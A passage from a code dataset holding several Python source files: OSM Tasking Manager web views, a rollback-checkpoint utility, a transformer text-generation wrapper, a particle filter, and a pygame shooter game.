request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n\n return get_stats(job)\n\n@view_config(route_name='job_contributors', renderer='json', permission='job',\n http_cache=0)\ndef job_contributors(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n\n return get_users(job)\n\n@view_config(route_name='job_user', renderer='json', permission='job',\n http_cache=0)\ndef job_user(request):\n id = request.matchdict['job']\n user = request.matchdict['user']\n session = DBSession()\n job = session.query(Job).get(id)\n\n return get_tiles_for_user(job, user)\n\n@view_config(route_name='job_geom', renderer='geojson', permission='edit')\ndef job_geom(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n return FeatureCollection([Feature(id=id, geometry=loads(job.geometry))])\n\n@view_config(route_name='job_tiles', renderer='geojson', permission='edit')\ndef job_tiles(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n tiles = []\n for tile in job.tiles:\n tiles.append(Feature(geometry=tile.to_polygon(),\n id=str(tile.x) + '-' + str(tile.y) + '-' + str(tile.zoom)))\n return FeatureCollection(tiles)\n\n@view_config(route_name='job_tiles_status', renderer='json', permission='edit')\ndef job_tiles_status(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n tiles = {}\n for tile in job.tiles:\n if tile.username is not None and tile.checkout is True \\\n or tile.checkin != 0:\n tiles[str(tile.x) + '-' + str(tile.y) + '-' + str(tile.zoom)] = dict(\n checkin=tile.checkin,\n username=(tile.username if tile.checkout is True else None))\n return tiles\n\n@view_config(route_name='job_edit', renderer='job.edit.mako', permission='admin')\ndef job_edit(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n\n licenses = session.query(License).all()\n\n if 'form.submitted' in request.params:\n job.title = request.params['title']\n job.short_description = request.params['short_description']\n job.description = request.params['description']\n job.workflow = request.params['workflow']\n josm_preset = request.params['josm_preset']\n josm_preset = josm_preset.value.decode('UTF-8') if josm_preset != '' else ''\n job.josm_preset = josm_preset\n job.is_private = request.params.get('is_private') == 'on'\n job.imagery = request.params['imagery']\n job.imagery_offset_x = parse_float(request.params['imagery_offset_x'])\n job.imagery_offset_y = parse_float(request.params['imagery_offset_y'])\n job.task_extra = request.params['task_extra']\n\n if request.params['license_id'] != \"\":\n license_id = int(request.params['license_id'])\n license = session.query(License).get(license_id)\n job.license = license\n\n session.add(job)\n return HTTPFound(location = route_url('job', request, job=job.id))\n\n return dict(job=job, licenses=licenses)\n\n@view_config(route_name='job_archive', permission='admin')\ndef job_archive(request):\n id = request.matchdict['job']\n session = DBSession()\n\n job = session.query(Job).get(id)\n job.status = 0\n session.add(job)\n\n request.session.flash('Job \"%s\" archived!' % job.title)\n return HTTPFound(location = route_url('home', request))\n\n@view_config(route_name='job_publish', permission='admin')\ndef job_publish(request):\n id = request.matchdict['job']\n session = DBSession()\n\n job = session.query(Job).get(id)\n job.status = 1\n session.add(job)\n\n request.session.flash('Job \"%s\" published!' % job.title)\n return HTTPFound(location = route_url('home', request))\n\n@view_config(route_name='job_feature', permission='admin')\ndef job_feature(request):\n id = request.matchdict['job']\n session = DBSession()\n\n job = session.query(Job).get(id)\n job.featured = not job.featured\n session.add(job)\n\n request.session.flash('Job \"%s\" featured status changed!' % job.title)\n return HTTPFound(location = route_url('home', request))\n\n@view_config(route_name='job_new', renderer='job.new.mako',\n permission='admin')\ndef job_new(request):\n if 'form.submitted' in request.params:\n session = DBSession()\n job = Job(\n request.params['title'],\n request.params['geometry'],\n request.params['zoom'],\n authenticated_userid(request)\n )\n\n session.add(job)\n session.flush()\n return HTTPFound(location = route_url('job_edit', request, job=job.id))\n return {}\n\n@view_config(route_name='job_users', renderer='job.users.mako', permission='admin')\ndef job_users(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n if 'form.submitted' in request.params:\n username = request.params['username']\n user = session.query(User).get(username)\n if user:\n job.users.append(user)\n session.flush()\n request.session.flash('User \"%s\" added to the whitelist!' % username)\n else:\n request.session.flash('User \"%s\" not found!' % username)\n all_users = session.query(User).order_by('username').all()\n return dict(job=job, all_users=all_users)\n\n@view_config(route_name='job_tags', renderer='job.tags.mako', permission='admin')\ndef job_tags(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n if 'form.submitted' in request.params:\n new_tag = request.params['tag']\n tag = session.query(Tag).get(new_tag)\n if tag is None:\n tag = Tag(new_tag)\n if (tag in job.tags) is False:\n job.tags.append(tag)\n\n all_tags = session.query(Tag).order_by('tag').all()\n return dict(job=job, all_tags=all_tags)\n\n@view_config(route_name='job_export', permission='admin')\ndef job_export(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n import shapefile\n w = shapefile.Writer(shapefile.POLYGON)\n w.field('checkin', 'N', 1, 0)\n for tile in job.tiles:\n polygon = tile.to_polygon(4326)\n coords = polygon.exterior.coords\n parts = [[[x, y] for (x, y) in coords]]\n w.poly(parts=parts)\n w.record(tile.checkin)\n # FIXME we should a temp directory\n w.save('/tmp/tiles')\n import zipfile\n myzip = zipfile.ZipFile('/tmp/tiles.zip', 'w', zipfile.ZIP_DEFLATED)\n myzip.write('/tmp/tiles.shp', job.title + '/tiles.shp')\n myzip.write('/tmp/tiles.dbf', job.title + '/tiles.dbf')\n myzip.write('/tmp/tiles.shx', job.title + '/tiles.shx')\n myzip.close()\n content_disposition = 'attachment; filename=export.zip'\n return request.get_response(FileApp('/tmp/tiles.zip', **{\"Content-Disposition\":content_disposition}))\n\n@view_config(route_name='job_preset')\ndef job_preset(request):\n id = request.matchdict['job']\n session = DBSession()\n job = session.query(Job).get(id)\n response = Response()\n response.text = job.josm_preset\n response.content_disposition = 'attachment; filename=hotosm_tasking_manager_job_%s.xml' % job.id\n response.content_type = 'application/x-josm-preset'\n return response\n\n\ndef get_stats(job):\n \"\"\"\n the changes (date, checkin) to create a chart with\n get the tiles that changed\n \"\"\"\n session = DBSession()\n\n filter = and_(\n TileHistory.change == True, TileHistory.job_id == job.id,\n TileHistory.username is not None, TileHistory.version > 0\n )\n tiles = (\n session.query(\n TileHistory.update, TileHistory.checkin, TileHistory.x,\n TileHistory.y, TileHistory.zoom\n )\n .filter(filter)\n .order_by(TileHistory.update)\n .all()\n )\n\n log.debug('Number of tiles: %s', len(tiles))\n stats = []\n done = 0\n tile_changes = []\n\n # group by days\n days_with_changes = (\n tile for tile in itertools.groupby(tiles, key=lambda t: t[0].date())\n )\n # for every day count number of changes and aggregate changed tiles\n for day in days_with_changes:\n for change in [change for change in day[1]]:\n if change.checkin == 1:\n done += 1\n if change.checkin == 0:\n done -= 1\n tile_changes.append([change.x, change.y, change.zoom])\n\n # append a day to the stats and add total number of 'done' tiles and a\n # copy of a current tile_changes list\n stats.append([day[0].isoformat(), done, tile_changes[:]])\n\n return stats\n\n\ndef get_users(job):\n \"\"\" the changes (date, checkin) to create the list of users with \"\"\"\n \"\"\" get the tiles that changed \"\"\"\n session = DBSession()\n # filter on tiles with changes, for this job, that have a username and have\n # checkin status == 1 (validation)\n filter = and_(\n TileHistory.change == True, TileHistory.job_id == job.id,\n TileHistory.username != None, TileHistory.checkin == 1,\n TileHistory.version > 0\n )\n # get the users, and order by username (IMPORTANT for group_by later)\n working_users = (\n session.query(\n TileHistory.username, TileHistory.x, TileHistory.y,\n TileHistory.zoom\n )\n .filter(filter)\n .order_by(TileHistory.username)\n .all()\n )\n\n # create a dictionary of users, grouped by username (aggregate tiles)\n # groupby will produce a key: grouper_object dictionary, so we use a list\n # comprehension to evaluate and expand every grouper_object\n users_grouped = {\n user[0]: [\n tile[1:] for tile in user[1]\n ]\n for user in itertools.groupby(working_users, key=lambda user: user[0])\n }\n\n log.debug('Users worked on job %s: %s', job.id, len(users_grouped))\n\n return users_grouped\n","repo_name":"hotosm/osm-tasking-manager","sub_path":"OSMTM/views/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":11910,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"77"} +{"seq_id":"69991534010","text":"import mgrapi\n\nclass InitialState(mgrapi.TimeInterval, mgrapi.TupleName):\n def __init__(self, name):\n self.name = name\n t = mgrapi.MinusInfinity()\n super(InitialState, self).__init__(t, t)\n\nclass StatelessActor(mgrapi.ActorNode):\n def __init__(self, name):\n super(StatelessActor, self).__init__(name)\n self.checkpoints.add(InitialState(name + ('ckpt',)))\n def rollback(self, cp):\n assert(isinstance(cp, InitialState))\n\nclass BufferCheckpoint(mgrapi.TimeInterval, mgrapi.TupleName):\n def __init__(self, name, t, data):\n self.name = name\n self.data = data\n super(BufferCheckpoint, self).__init__(t, t)\n\nclass BufferNode(mgrapi.DataNode):\n def __init__(self, name, t, origdata):\n \"\"\"origdata is an instance of record\"\"\"\n super(BufferNode, self).__init__(name)\n self.origdata = origdata\n self.data = origdata\n self.checkpoints.add(BufferCheckpoint(name + ('ckpt0',),\n mgrapi.MinusInfinity(),\n None))\n self.checkpoints.add(BufferCheckpoint(name + ('ckpt1',),\n t, origdata))\n def rollback(self, cp):\n assert(isinstance(cp, BufferCheckpoint))\n self.data = cp.data\n","repo_name":"haowu4682/repair","sub_path":"code/retro/repair/mgrutil.py","file_name":"mgrutil.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29209708719","text":"import logging\n\nimport numpy as np\nimport torch\n\nfrom transformers import (\n CTRLLMHeadModel,\n CTRLTokenizer,\n GPT2LMHeadModel,\n GPT2Tokenizer,\n OpenAIGPTLMHeadModel,\n OpenAIGPTTokenizer,\n TransfoXLLMHeadModel,\n TransfoXLTokenizer,\n XLMTokenizer,\n XLMWithLMHeadModel,\n XLNetLMHeadModel,\n XLNetTokenizer,\n)\n\n\nlogging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\", datefmt=\"%m/%d/%Y %H:%M:%S\", level=logging.INFO,\n)\nlogger = logging.getLogger(__name__)\nlogging.disable(logging.INFO)\n\nMAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop\n\nMODEL_CLASSES = {\n \"gpt2\": (GPT2LMHeadModel, GPT2Tokenizer),\n \"ctrl\": (CTRLLMHeadModel, CTRLTokenizer),\n \"openai-gpt\": (OpenAIGPTLMHeadModel, OpenAIGPTTokenizer),\n \"xlnet\": (XLNetLMHeadModel, XLNetTokenizer),\n \"transfo-xl\": (TransfoXLLMHeadModel, TransfoXLTokenizer),\n \"xlm\": (XLMWithLMHeadModel, XLMTokenizer),\n}\n\n# Padding text to help Transformer-XL and XLNet with short prompts as proposed by Aman Rusia\n# in https://github.com/rusiaaman/XLNet-gen#methodology\n# and https://medium.com/@amanrusia/xlnet-speaks-comparison-to-gpt-2-ea1a4e9ba39e\nPADDING_TEXT = \"\"\" In 1991, the remains of Russian Tsar Nicholas II and his family\n(except for Alexei and Maria) are discovered.\nThe voice of Nicholas's young son, Tsarevich Alexei Nikolaevich, narrates the\nremainder of the story. 1883 Western Siberia,\na young Grigori Rasputin is asked by his father and a group of men to perform magic.\nRasputin has a vision and denounces one of the men as a horse thief. Although his\nfather initially slaps him for making such an accusation, Rasputin watches as the\nman is chased outside and beaten. Twenty years later, Rasputin sees a vision of\nthe Virgin Mary, prompting him to become a priest. Rasputin quickly becomes famous,\nwith people, even a bishop, begging for his blessing. \"\"\"\n\n\ndef set_seed(seed, n_gpu):\n np.random.seed(seed)\n torch.manual_seed(seed)\n if n_gpu > 0:\n torch.cuda.manual_seed_all(seed)\n\n\ndef prepare_ctrl_input(args, _, tokenizer, prompt_text):\n if args.temperature > 0.7:\n logger.info(\"CTRL typically works better with lower temperatures (and lower top_k).\")\n\n encoded_prompt = tokenizer.encode(prompt_text, add_special_tokens=False)\n if not any(encoded_prompt[0] == x for x in tokenizer.control_codes.values()):\n logger.info(\"WARNING! You are not starting your generation from a control code so you won't get good results\")\n return prompt_text\n\n\ndef prepare_xlm_input(args, model, tokenizer, prompt_text):\n # kwargs = {\"language\": None, \"mask_token_id\": None}\n\n # Set the language\n use_lang_emb = hasattr(model.config, \"use_lang_emb\") and model.config.use_lang_emb\n if hasattr(model.config, \"lang2id\") and use_lang_emb:\n available_languages = model.config.lang2id.keys()\n if args.xlm_language in available_languages:\n language = args.xlm_language\n else:\n language = None\n while language not in available_languages:\n language = input(\"Using XLM. Select language in \" + str(list(available_languages)) + \" >>> \")\n # kwargs[\"language\"] = tokenizer.lang2id[language]\n\n # TODO fix mask_token_id setup when configurations will be synchronized between models and tokenizers\n # XLM masked-language modeling (MLM) models need masked token\n # is_xlm_mlm = \"mlm\" in args.model_name_or_path\n # if is_xlm_mlm:\n # kwargs[\"mask_token_id\"] = tokenizer.mask_token_id\n\n return prompt_text\n\n\ndef prepare_xlnet_input(args, _, tokenizer, prompt_text):\n prompt_text = (args.padding_text if args.padding_text else PADDING_TEXT) + prompt_text\n return prompt_text, {}\n\n\ndef prepare_transfoxl_input(args, _, tokenizer, prompt_text):\n prompt_text = (args.padding_text if args.padding_text else PADDING_TEXT) + prompt_text\n return prompt_text, {}\n\n\nPREPROCESSING_FUNCTIONS = {\n \"ctrl\": prepare_ctrl_input,\n \"xlm\": prepare_xlm_input,\n \"xlnet\": prepare_xlnet_input,\n \"transfo-xl\": prepare_transfoxl_input,\n}\n\n\ndef adjust_length_to_model(length, max_sequence_length):\n if length < 0 and max_sequence_length > 0:\n length = max_sequence_length\n elif 0 < max_sequence_length < length:\n length = max_sequence_length # No generation bigger than model size\n elif length < 0:\n length = MAX_LENGTH # avoid infinite loop\n return length\n\n\nclass TextGenerator:\n def __init__(\n self,\n model_type: str,\n model_name_or_path: str,\n padding_text: str = \"\",\n xlm_language: str = \"\",\n seed: int = 42,\n no_cuda: bool = False\n ):\n self.model_type = model_type.lower()\n self.model_name_or_path = model_name_or_path\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() and not no_cuda else \"cpu\")\n self.n_gpu = torch.cuda.device_count()\n\n set_seed(seed, self.n_gpu)\n \n # Initialize the model and tokenizer\n try:\n self.model_class, self.tokenizer_class = MODEL_CLASSES[self.model_type]\n except KeyError:\n raise KeyError(\"the model {} you specified is not supported. You are welcome to add it and open a PR :)\")\n\n self.tokenizer = self.tokenizer_class.from_pretrained(self.model_name_or_path)\n self.model = self.model_class.from_pretrained(self.model_name_or_path)\n self.model.to(self.device)\n\n def generate(\n self,\n prompt: str = \"\",\n length: int = 20,\n stop_token: str = \"\",\n temperature: float = 1.0,\n repetition_penalty: float = 1.0,\n k: int = 0,\n p: float = 0.9,\n ):\n length = adjust_length_to_model(\n length,\n max_sequence_length=self.model.config.max_position_embeddings\n )\n\n # Different models need different input formatting and/or extra arguments\n requires_preprocessing = self.model_type in PREPROCESSING_FUNCTIONS.keys()\n # if requires_preprocessing:\n # prepare_input = PREPROCESSING_FUNCTIONS.get(self.model_type)\n # prompt = prepare_input(args, self.model, self.tokenizer, prompt)\n encoded_prompt = self.tokenizer.encode(prompt, add_special_tokens=False, return_tensors=\"pt\")\n encoded_prompt = encoded_prompt.to(self.device)\n\n output_sequences = self.model.generate(\n input_ids=encoded_prompt,\n max_length=length,\n temperature=temperature,\n top_k=k,\n top_p=p,\n repetition_penalty=repetition_penalty,\n )\n\n # Batch size == 1. to add more examples please use num_return_sequences > 1\n generated_sequence = output_sequences[0].tolist()\n text = self.tokenizer.decode(generated_sequence, clean_up_tokenization_spaces=True)\n text = text[: text.find(stop_token) if stop_token else None]\n\n return text\n","repo_name":"kabirkhan/synth","sub_path":"synth/generation.py","file_name":"generation.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21043517002","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nfrom math import atan2\nfrom numpy.linalg import norm\nfrom numpy.random import randn\nfrom numpy.random import random, uniform\nimport scipy.stats\n\n\nclass PF:\n def __init__(self, N, landmarks, measure_std_error, control_std_error, state_vector_size):\n self.mean = 0\n self.std = 0\n self.N = N\n self.dt = 0.1\n self.state_vector = np.zeros(state_vector_size)\n self.weights = np.zeros(self.N)\n #self.weights.fill(1./self.N)\n self.particles = np.empty((self.N, 3))\n self.landmarks = landmarks\n #self.R = [measure_std_error, control_std_error]\n self.R = measure_std_error\n # range error\n self.Q = np.diag([0.1])**2\n # input error\n #self.R = np.diag([1.0, np.deg2rad(40.0)])**2 \n \n\n def create_gaussian_particles(self, mean, std):\n self.particles = np.empty((self.N, 3))\n self.particles[:, 0] = mean[0] + (randn(self.N) * std[0])\n self.particles[:, 1] = mean[1] + (randn(self.N) * std[1])\n self.particles[:, 2] = mean[2] + (randn(self.N) * std[2])\n self.particles[:, 2] %= 2 * np.pi\n\n def create_uniform_particles(self, x_range, y_range, hdg_range, N):\n self.particles = np.empty((self.N, 3))\n self.particles[:, 0] = uniform(x_range[0], x_range[1], size=N)\n self.particles[:, 1] = uniform(y_range[0], y_range[1], size=N)\n self.particles[:, 2] = uniform(hdg_range[0], hdg_range[1], size=N)\n self.particles[:, 2] %= 2 * np.pi\n \n \n\n def neff(self, weights):\n return 1. / np.sum(np.square(weights))\n \n def predict(self, u, std, dt=1.):\n #N = len(self.particles)\n self.state_vector[0] += (-u[0]/u[1])*np.sin(self.state_vector[2])+(u[0]/u[1])*np.sin(self.state_vector[2]+u[1]*dt)\n self.state_vector[1] += (u[0]/u[1])*np.cos(self.state_vector[2])-(u[0]/u[1])*np.cos(self.state_vector[2]+u[1]*dt)\n self.state_vector[2] += u[1]*dt\n\n self.particles[:,0] += (-u[0]/u[1])*np.sin(self.particles[:,2])+(u[0]/u[1])*np.sin(self.particles[:,2]+u[1]*dt)\n self.particles[:,1] += (u[0]/u[1])*np.cos(self.particles[:,2])-(u[0]/u[1])*np.cos(self.particles[:,2]+u[1]*dt)\n self.particles[:,2] += u[1]*dt\n \n def update(self, z, markers):\n self.weights.fill(1.)\n for i, landmark in enumerate(markers):\n distance = np.linalg.norm(self.particles[:, 0:2] - landmark, axis=1)\n self.weights *= scipy.stats.norm(distance, self.R).pdf(z[i])\n\n self.weights += 1.e-300\n self.weights /= sum(self.weights)\n \n\n\n def resample(self):\n \n cumulative_sum = np.cumsum(self.weights)\n cumulative_sum[-1] = 1. # avoid round-off error\n indexes = np.searchsorted(cumulative_sum, random(self.N))\n\n # resample according to indexes\n self.particles = self.particles[indexes]\n self.weights = self.weights[indexes]\n self.weights /= np.sum(self.weights) # normalize\n\n def estimate(self):\n \"\"\" returns mean and variance \"\"\"\n \n pos = self.particles[:, 0:3]\n mu = np.average(pos, weights=self.weights, axis=0)\n var = np.average((pos - mu)**2, weights=self.weights, axis=0)\n self.state_vector = mu\n return mu, var","repo_name":"ZY-KK/tuni_robot_motion","sub_path":"src/moro_ros/filtering_utils/src/filtering_utils/pf.py","file_name":"pf.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25814414874","text":"from cProfile import run\r\nfrom json import load\r\nfrom turtle import left\r\nimport pygame\r\nimport random\r\nimport os\r\nimport json\r\n\r\nFPS = 60 #一秒內遊戲更新的次數\r\nWIDTH = 500\r\nHEIGHT = 700\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\n\r\nclock = pygame.time.Clock() #管理遊戲的時間\r\n#初始化&創建視窗\r\npygame.init()\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT)) #設定視窗大小\r\npygame.display.set_caption(\"JetGame\") #視窗名稱\r\n\r\n#載入背景圖片\r\nbackground_img = pygame.image.load(os.path.join(\"image\", \"background.png\")).convert() #convert轉換成pygame容易讀取的格式\r\nbackground02_img = pygame.image.load(os.path.join(\"image\", \"background.png\")).convert()\r\nbackground_size = background_img.get_size()\r\nbackground_rect = background_img.get_rect()\r\nx0, y0 = 0, 0 #背景1初始位置\r\nx1, y1 = 0, -700 #背景2初始位置\r\n\r\n#載入物件圖片\r\nrock_img = pygame.image.load(os.path.join(\"image\", \"rock.png\")).convert()\r\nbullet_img = pygame.image.load(os.path.join(\"image\", \"bullet.png\")).convert()\r\nbullet02_img = pygame.image.load(os.path.join(\"image\", \"bullet02.png\")).convert()\r\nplane01_img = pygame.image.load(os.path.join(\"image\", \"plane01(1).png\")).convert()\r\nplane01R_img = pygame.image.load(os.path.join(\"image\", \"plane01_R30.png\")).convert()\r\nplane01L_img = pygame.image.load(os.path.join(\"image\", \"plane01_L30.png\")).convert()\r\nenmies_img = pygame.image.load(os.path.join(\"image\", \"plane03.png\")).convert()\r\n\r\n#載入字體\r\nfont_name = pygame.font.match_font('arial')\r\n\r\n#印出分數\r\ndef write_text(surf, text, size, x, y):\r\n font = pygame.font.Font(font_name, size)\r\n text_surface = font.render(text, True, WHITE) #True是代表要用反鋸齒\r\n text_rect = text_surface.get_rect()\r\n text_rect.centerx = x\r\n text_rect.top = y\r\n surf.blit(text_surface, text_rect) #畫出文字\r\n\r\n#印出生命數\r\ndef draw_lifes(surf, text, size, x, y):\r\n font = pygame.font.Font(font_name, size)\r\n text_surface = font.render(text, True, RED) #True是代表要用反鋸齒\r\n text_rect = text_surface.get_rect()\r\n text_rect.centerx = x\r\n text_rect.top = y\r\n surf.blit(text_surface, text_rect) #畫出文字\r\n\r\n#def newRock():\r\n# rock = Rock()\r\n# all_sprites.add(rock) #刪除石頭後要再增加新的石頭並加回群組\r\n# rocks.add(rock) \r\n\r\ndef newEnmies():\r\n enmy = Enmies()\r\n all_sprites.add(enmy)\r\n enmies.add(enmy) \r\n\r\n#玩家\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self) #呼叫初始函式\r\n #self.image = pygame.Surface((70, 120)) #顯示的圖片\r\n #self.image.fill((100, 100, 100)) \r\n self.direction = 0\r\n self.image = pygame.transform.scale(plane01_img, (120, 100)) #調整圖片大小\r\n self.image.set_colorkey(BLACK) #圖片去背\r\n self.rect = self.image.get_rect() #圖片定位(外框)\r\n self.radius = 35 #圓型碰撞範圍半徑\r\n pygame.draw.circle(self.image, WHITE, self.rect.center, self.radius) #畫出圓形\r\n self.rect.centerx = WIDTH / 2\r\n self.rect.bottom = HEIGHT - 50\r\n self.speedx = 7 #圖片移動速度\r\n self.lifes = 5\r\n\r\n def animate(self):\r\n if self.direction == -1: #向左\r\n self.image = pygame.transform.scale(plane01L_img, (120, 100))\r\n self.image.set_colorkey(BLACK)\r\n #self.rect = self.image.get_rect()\r\n elif self.direction == 1: #向右\r\n self.image = pygame.transform.scale(plane01R_img, (120, 100))\r\n self.image.set_colorkey(BLACK)\r\n #self.rect = self.image.get_rect()\r\n else:\r\n self.image = pygame.transform.scale(plane01_img, (120, 100))\r\n self.image.set_colorkey(BLACK)\r\n #self.rect = self.image.get_rect()\r\n\r\n def update(self):\r\n #wasd移動圖片\r\n self.image = pygame.transform.scale(plane01_img, (120, 100))\r\n self.direction = 0\r\n\r\n key_pressed = pygame.key.get_pressed() #判斷鍵盤有沒有被按下\r\n if key_pressed[pygame.K_d]: #按下d的話圖片往右移\r\n self.direction = 1\r\n self.rect.x += self.speedx\r\n if self.rect.centerx > WIDTH: #如果圖片碰到邊緣就不再往右\r\n self.rect.centerx = WIDTH\r\n\r\n if key_pressed[pygame.K_a]: \r\n self.direction = -1\r\n self.rect.x -= self.speedx\r\n if self.rect.centerx < 0:\r\n self.rect.centerx = 0;\r\n\r\n if key_pressed[pygame.K_w]: \r\n self.rect.y -= self.speedx\r\n if self.rect.top < 0:\r\n self.rect.top = 0;\r\n\r\n if key_pressed[pygame.K_s]: \r\n self.rect.y += self.speedx\r\n if self.rect.bottom - 10 > HEIGHT:\r\n self.rect.bottom= HEIGHT + 10 ;\r\n \r\n #子彈發射\r\n def shoot(self):\r\n bullet = Bullet(self.rect.centerx, self.rect.top + 30)\r\n all_sprites.add(bullet) \r\n bullets.add(bullet) \r\n\r\nclass Rock(pygame.sprite.Sprite):\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self) #呼叫初始函式\r\n #self.image = pygame.Surface((30, 30)) #顯示的圖片\r\n #self.image.fill((0, 0, 0)) \r\n self.image = pygame.transform.scale(rock_img, (40, 40)) #調整圖片大小\r\n self.image.set_colorkey(BLACK) #圖片去背\r\n self.rect = self.image.get_rect() #圖片定位(外框)\r\n self.radius = 15 #圓型碰撞範圍半徑\r\n #pygame.draw.circle(self.image, WHITE, self.rect.center, self.radius) #畫出圓形\r\n self.rect.x = random.randrange(0, WIDTH - self.rect.width) #初始x座標用隨機設定(範圍設在視窗內)\r\n self.rect.y = random.randrange(-150, -100) #初始y座標用隨機設定(範圍設在視窗外)\r\n self.speedy = random.randrange(3, 7) #圖片移動速度\r\n self.speedx = random.randrange(-3, 3)\r\n\r\n def update(self):\r\n #石頭移動 \r\n self.rect.y += self.speedy\r\n self.rect.x += self.speedx\r\n\r\n #石頭超出視窗就重設初始位置\r\n if self.rect.top > HEIGHT or self.rect.left > WIDTH or self.rect.right < 0:\r\n self.rect.x = random.randrange(0, WIDTH - self.rect.width)\r\n self.rect.y = random.randrange(-150, -40)\r\n self.speedy = random.randrange(2, 10)\r\n self.speedx = random.randrange(-3, 3)\r\n\r\nclass Enmies(pygame.sprite.Sprite):\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self) #呼叫初始函式\r\n #self.image = pygame.Surface((30, 30)) #顯示的圖片\r\n #self.image.fill((0, 0, 0)) \r\n self.image = pygame.transform.scale(enmies_img, (80, 60)) #調整圖片大小\r\n self.image.set_colorkey(WHITE) #圖片去背\r\n self.rect = self.image.get_rect() #圖片定位(外框)\r\n self.radius = 18 #圓型碰撞範圍半徑\r\n #pygame.draw.circle(self.image, RED, self.rect.center, self.radius) #畫出圓形\r\n self.rect.x = random.randrange(0, WIDTH - self.rect.width) #初始x座標用隨機設定(範圍設在視窗內)\r\n #self.rect.y = random.randrange(-150, -100) #初始y座標用隨機設定(範圍設在視窗外)\r\n self.rect.y = 70\r\n self.speedy = random.randrange(3, 7) #圖片移動速度\r\n self.speedx = random.randrange(-3, 3)\r\n\r\n def update(self):\r\n #移動 \r\n #self.rect.y += self.speedy\r\n self.rect.x += self.speedx\r\n\r\n #超出視窗就重設初始位置\r\n if self.rect.top > HEIGHT or self.rect.left > WIDTH or self.rect.right < 0:\r\n self.rect.x = random.randrange(0, WIDTH - self.rect.width)\r\n #self.rect.y = random.randrange(-150, -40)\r\n #self.speedy = random.randrange(2, 10)\r\n self.rect.y = 70\r\n self.speedx = random.randrange(-3, 3)\r\n\r\nclass Bullet(pygame.sprite.Sprite):\r\n def __init__(self, x, y):\r\n pygame.sprite.Sprite.__init__(self) #呼叫初始函式\r\n #self.image = pygame.Surface((10, 30)) #顯示的圖片\r\n #self.image.fill((200, 200, 0)) \r\n self.image = pygame.transform.scale(bullet_img, (30, 40)) #調整圖片大小\r\n self.image.set_colorkey(0, 255) #圖片去背\r\n self.rect = self.image.get_rect() #圖片定位(外框)\r\n self.rect.centerx = x\r\n self.rect.bottom = y #初始y座標用隨機設定(範圍設在視窗外)\r\n self.speedy = 10\r\n \r\n def update(self):\r\n self.rect.y -= self.speedy\r\n if self.rect.bottom < 0:\r\n self.kill() #把物件從所有群組中刪除\r\n\r\n #sprite群組 可以放進sprite的物件\r\nall_sprites = pygame.sprite.Group()\r\n#rocks = pygame.sprite.Group()\r\nenmies = pygame.sprite.Group()\r\nbullets = pygame.sprite.Group()\r\nplayer = Player()\r\nplayer_group = pygame.sprite.Group()\r\nplayer_group.add(player)\r\nall_sprites.add(player) #把物件放進group裡\r\n#for i in range(7): #生成數個石頭\r\n# newRock()\r\n\r\nfor i in range(7):\r\n newEnmies()\r\n\r\nscore = 0 #分數\r\n#lifes = 5 #生命數\r\n\r\n#遊戲迴圈\r\nrunning = True\r\n\r\nwhile running:\r\n clock.tick(FPS) #一秒內最多的執行次數\r\n\r\n #取得輸入\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT: #關閉視窗\r\n running = False\r\n\r\n elif event.type == pygame.KEYDOWN: #判斷鍵盤按下\r\n if event.key == pygame.K_SPACE:\r\n player.shoot()\r\n\r\n #更新遊戲\r\n all_sprites.update() #groups裡所有物件update\r\n Player.animate(player) #角色移動動畫\r\n hits = pygame.sprite.groupcollide(enmies, bullets, True, True) #判斷碰撞以及是否刪除物件\r\n for hit in hits: \r\n score += 30\r\n #newRock()\r\n #newEnmies()\r\n if score == 210: running = False\r\n \r\n hits = pygame.sprite.spritecollide(player, enmies, True, pygame.sprite.collide_circle) #判斷飛船跟石頭碰撞\r\n for hit in hits: #碰到石頭就扣一條命\r\n player.lifes -= 1\r\n if player.lifes <= 0: running = False\r\n #newRock()\r\n newEnmies\r\n\r\n y1 += 5 #背景移動\r\n y0 += 5 #背景移動\r\n screen.blit(pygame.transform.scale(background_img, (500, 700)), (x0, y0))\r\n screen.blit(pygame.transform.scale(background_img, (500, 700)), (x1, y1))\r\n if y0 > 700: y0 = -700 #圖片到底就重新放回上方\r\n if y1 > 700: y1 = -700\r\n\r\n all_sprites.draw(screen) #把sprites的東西都畫到screen上\r\n write_text(screen, \"score: \" + str(score), 22, 70, 30)\r\n draw_lifes(screen, \"lifes: \" + str(player.lifes), 22, 70, 650)\r\n\r\n pygame.display.flip()\r\n pygame.display.update()\r\n 